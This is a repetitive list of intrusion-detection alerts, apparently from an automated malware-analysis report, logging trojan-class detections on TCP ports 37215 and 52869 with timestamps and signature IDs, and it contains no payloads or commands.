                      Timestamp:2024-07-20T23:01:00.661808+0200
                      SID:2835222
                      Source Port:54854
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:00.648916+0200
                      SID:2835222
                      Source Port:59370
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:18.526699+0200
                      SID:2835222
                      Source Port:58950
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.181268+0200
                      SID:2027339
                      Source Port:60326
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.184421+0200
                      SID:2835222
                      Source Port:38946
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.203030+0200
                      SID:2835222
                      Source Port:41970
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.188822+0200
                      SID:2835222
                      Source Port:34358
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:22.224479+0200
                      SID:2027339
                      Source Port:39416
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.175742+0200
                      SID:2835222
                      Source Port:41506
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:02.136941+0200
                      SID:2835222
                      Source Port:44984
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:00.663232+0200
                      SID:2835222
                      Source Port:57736
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:20.359095+0200
                      SID:2027339
                      Source Port:37202
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.223718+0200
                      SID:2835222
                      Source Port:49544
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:00.648489+0200
                      SID:2835222
                      Source Port:35680
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.085513+0200
                      SID:2835222
                      Source Port:38216
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.160094+0200
                      SID:2027339
                      Source Port:49722
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.214465+0200
                      SID:2027339
                      Source Port:38334
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:00.652845+0200
                      SID:2835222
                      Source Port:60452
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.164966+0200
                      SID:2835222
                      Source Port:55784
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:18.271403+0200
                      SID:2835222
                      Source Port:45112
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.198929+0200
                      SID:2027339
                      Source Port:60402
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:20.287563+0200
                      SID:2027339
                      Source Port:49352
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:02.127340+0200
                      SID:2835222
                      Source Port:47078
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:18.416781+0200
                      SID:2835222
                      Source Port:41818
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:19.463189+0200
                      SID:2027339
                      Source Port:43256
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:00.660317+0200
                      SID:2835222
                      Source Port:47164
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:00.657714+0200
                      SID:2835222
                      Source Port:58502
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:02.083467+0200
                      SID:2835222
                      Source Port:35136
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:07.151635+0200
                      SID:2835222
                      Source Port:42202
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:09.027075+0200
                      SID:2027339
                      Source Port:49516
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.444565+0200
                      SID:2835222
                      Source Port:49432
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:08.912088+0200
                      SID:2027339
                      Source Port:34906
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.239495+0200
                      SID:2027339
                      Source Port:34482
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:04.444176+0200
                      SID:2027339
                      Source Port:57262
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.218458+0200
                      SID:2835222
                      Source Port:53706
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:20.301694+0200
                      SID:2027339
                      Source Port:42216
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:20.368453+0200
                      SID:2027339
                      Source Port:49258
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:20.249177+0200
                      SID:2027339
                      Source Port:52264
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:00.658630+0200
                      SID:2835222
                      Source Port:57218
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:09.107954+0200
                      SID:2027339
                      Source Port:59924
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:22.216856+0200
                      SID:2027339
                      Source Port:35090
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:00.658630+0200
                      SID:2835222
                      Source Port:37642
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:18.269553+0200
                      SID:2835222
                      Source Port:53130
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:00.652845+0200
                      SID:2835222
                      Source Port:53540
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:00.652845+0200
                      SID:2835222
                      Source Port:35956
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:19.428185+0200
                      SID:2027339
                      Source Port:47302
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:19.637159+0200
                      SID:2027339
                      Source Port:48726
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.181164+0200
                      SID:2835222
                      Source Port:56512
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:00.654988+0200
                      SID:2835222
                      Source Port:45072
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.198842+0200
                      SID:2835222
                      Source Port:55384
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.221137+0200
                      SID:2027339
                      Source Port:37000
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:18.424063+0200
                      SID:2835222
                      Source Port:47604
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:20.367117+0200
                      SID:2027339
                      Source Port:34796
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:02.079114+0200
                      SID:2835222
                      Source Port:33230
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:19.831896+0200
                      SID:2027339
                      Source Port:34016
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:13.014947+0200
                      SID:2027339
                      Source Port:52536
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.171003+0200
                      SID:2835222
                      Source Port:48482
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.218459+0200
                      SID:2835222
                      Source Port:39976
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:18.422394+0200
                      SID:2835222
                      Source Port:39456
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.967477+0200
                      SID:2835222
                      Source Port:42512
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:22.232607+0200
                      SID:2027339
                      Source Port:33400
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:08.957638+0200
                      SID:2027339
                      Source Port:47288
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:19.462356+0200
                      SID:2027339
                      Source Port:48042
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:02.088423+0200
                      SID:2835222
                      Source Port:43708
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.219743+0200
                      SID:2835222
                      Source Port:33424
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.812527+0200
                      SID:2027339
                      Source Port:59006
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:18.204287+0200
                      SID:2835222
                      Source Port:48860
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:00.660317+0200
                      SID:2835222
                      Source Port:42956
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:11.815719+0200
                      SID:2835222
                      Source Port:42374
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:08.903232+0200
                      SID:2027339
                      Source Port:54976
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.224296+0200
                      SID:2835222
                      Source Port:33444
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:00.654559+0200
                      SID:2835222
                      Source Port:47982
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:20.267455+0200
                      SID:2027339
                      Source Port:59822
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:02.065822+0200
                      SID:2835222
                      Source Port:45764
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:02.067656+0200
                      SID:2835222
                      Source Port:47744
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:19.858909+0200
                      SID:2027339
                      Source Port:38982
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:00.660317+0200
                      SID:2835222
                      Source Port:60910
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.822539+0200
                      SID:2027339
                      Source Port:49808
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:09.002255+0200
                      SID:2027339
                      Source Port:38116
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.124881+0200
                      SID:2027339
                      Source Port:59050
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:18.405549+0200
                      SID:2835222
                      Source Port:53302
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:23.420472+0200
                      SID:2027339
                      Source Port:35948
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:18.422394+0200
                      SID:2835222
                      Source Port:44458
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:19.876924+0200
                      SID:2027339
                      Source Port:50834
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:19.341430+0200
                      SID:2027339
                      Source Port:49348
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.567284+0200
                      SID:2027339
                      Source Port:34988
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:19.859313+0200
                      SID:2027339
                      Source Port:55998
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.272933+0200
                      SID:2027339
                      Source Port:55066
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:22.258326+0200
                      SID:2835222
                      Source Port:33984
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.271803+0200
                      SID:2027339
                      Source Port:36072
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:22.249100+0200
                      SID:2027339
                      Source Port:45276
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.223718+0200
                      SID:2835222
                      Source Port:56072
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:18.493759+0200
                      SID:2835222
                      Source Port:51880
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.056479+0200
                      SID:2027339
                      Source Port:33450
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.223718+0200
                      SID:2835222
                      Source Port:37906
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.227759+0200
                      SID:2835222
                      Source Port:42692
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:18.247235+0200
                      SID:2835222
                      Source Port:56886
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.202997+0200
                      SID:2835222
                      Source Port:51864
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:20.235362+0200
                      SID:2027339
                      Source Port:44404
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.152484+0200
                      SID:2027339
                      Source Port:52936
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:00.649623+0200
                      SID:2835222
                      Source Port:58024
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:19.901007+0200
                      SID:2027339
                      Source Port:53882
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.164966+0200
                      SID:2835222
                      Source Port:50026
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:02.135090+0200
                      SID:2027339
                      Source Port:37616
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.286674+0200
                      SID:2027339
                      Source Port:60246
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:25.181612+0200
                      SID:2835222
                      Source Port:47014
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:14.013456+0200
                      SID:2835222
                      Source Port:34426
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.827430+0200
                      SID:2027339
                      Source Port:54854
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:08.903232+0200
                      SID:2027339
                      Source Port:51704
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:02.127340+0200
                      SID:2835222
                      Source Port:45384
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.187021+0200
                      SID:2027339
                      Source Port:52722
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.201622+0200
                      SID:2835222
                      Source Port:53044
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.181164+0200
                      SID:2835222
                      Source Port:43828
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.099180+0200
                      SID:2027339
                      Source Port:51752
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:06.518801+0200
                      SID:2835222
                      Source Port:48734
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:09.027075+0200
                      SID:2027339
                      Source Port:44806
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:19.924916+0200
                      SID:2027339
                      Source Port:56840
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.894210+0200
                      SID:2027339
                      Source Port:39610
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:00.658201+0200
                      SID:2835222
                      Source Port:50596
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:19.861361+0200
                      SID:2027339
                      Source Port:35458
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.224296+0200
                      SID:2835222
                      Source Port:41502
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.224296+0200
                      SID:2835222
                      Source Port:44780
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:00.657714+0200
                      SID:2835222
                      Source Port:36270
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:11.815702+0200
                      SID:2835222
                      Source Port:38990
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:19.845074+0200
                      SID:2027339
                      Source Port:41078
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:20.275632+0200
                      SID:2027339
                      Source Port:52638
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.203029+0200
                      SID:2835222
                      Source Port:43118
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.170219+0200
                      SID:2835222
                      Source Port:43252
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:00.649623+0200
                      SID:2835222
                      Source Port:47368
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:02.068476+0200
                      SID:2835222
                      Source Port:57456
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:23.911724+0200
                      SID:2027339
                      Source Port:46058
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:00.658298+0200
                      SID:2835222
                      Source Port:44098
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.180699+0200
                      SID:2835222
                      Source Port:56186
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:09.140149+0200
                      SID:2027339
                      Source Port:59256
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:18.294174+0200
                      SID:2835222
                      Source Port:44052
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:09.195568+0200
                      SID:2027339
                      Source Port:46100
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:22.231631+0200
                      SID:2027339
                      Source Port:42842
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.231934+0200
                      SID:2027339
                      Source Port:43060
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.973875+0200
                      SID:2027339
                      Source Port:57512
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.020720+0200
                      SID:2835222
                      Source Port:53564
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.279590+0200
                      SID:2027339
                      Source Port:37696
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.175742+0200
                      SID:2835222
                      Source Port:35634
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:18.295501+0200
                      SID:2835222
                      Source Port:47794
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.181035+0200
                      SID:2835222
                      Source Port:58556
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:00.658298+0200
                      SID:2835222
                      Source Port:38304
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:22.247638+0200
                      SID:2027339
                      Source Port:39008
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:00.652845+0200
                      SID:2835222
                      Source Port:57110
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:00.657714+0200
                      SID:2835222
                      Source Port:59334
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:02.067655+0200
                      SID:2835222
                      Source Port:55246
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.211994+0200
                      SID:2835222
                      Source Port:36396
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:18.296946+0200
                      SID:2835222
                      Source Port:55530
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.219743+0200
                      SID:2835222
                      Source Port:46650
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.227759+0200
                      SID:2835222
                      Source Port:46618
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:19.496217+0200
                      SID:2027339
                      Source Port:56974
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.011580+0200
                      SID:2027339
                      Source Port:45810
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:18.608485+0200
                      SID:2835222
                      Source Port:49446
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:20.191460+0200
                      SID:2027339
                      Source Port:59250
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.216912+0200
                      SID:2835222
                      Source Port:56980
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:00.661486+0200
                      SID:2835222
                      Source Port:46116
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.211994+0200
                      SID:2835222
                      Source Port:56934
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.224296+0200
                      SID:2835222
                      Source Port:40842
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:18.423367+0200
                      SID:2835222
                      Source Port:43680
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:19.826663+0200
                      SID:2027339
                      Source Port:51590
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.201622+0200
                      SID:2835222
                      Source Port:34654
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:18.278953+0200
                      SID:2835222
                      Source Port:46136
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:19.439299+0200
                      SID:2027339
                      Source Port:34398
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.014789+0200
                      SID:2027339
                      Source Port:57522
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:02.066021+0200
                      SID:2835222
                      Source Port:48170
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.218459+0200
                      SID:2835222
                      Source Port:48742
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.218458+0200
                      SID:2835222
                      Source Port:55528
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:18.159021+0200
                      SID:2835222
                      Source Port:36734
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.163619+0200
                      SID:2835222
                      Source Port:53610
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.176163+0200
                      SID:2835222
                      Source Port:37060
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:02.127340+0200
                      SID:2835222
                      Source Port:36284
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.171996+0200
                      SID:2027339
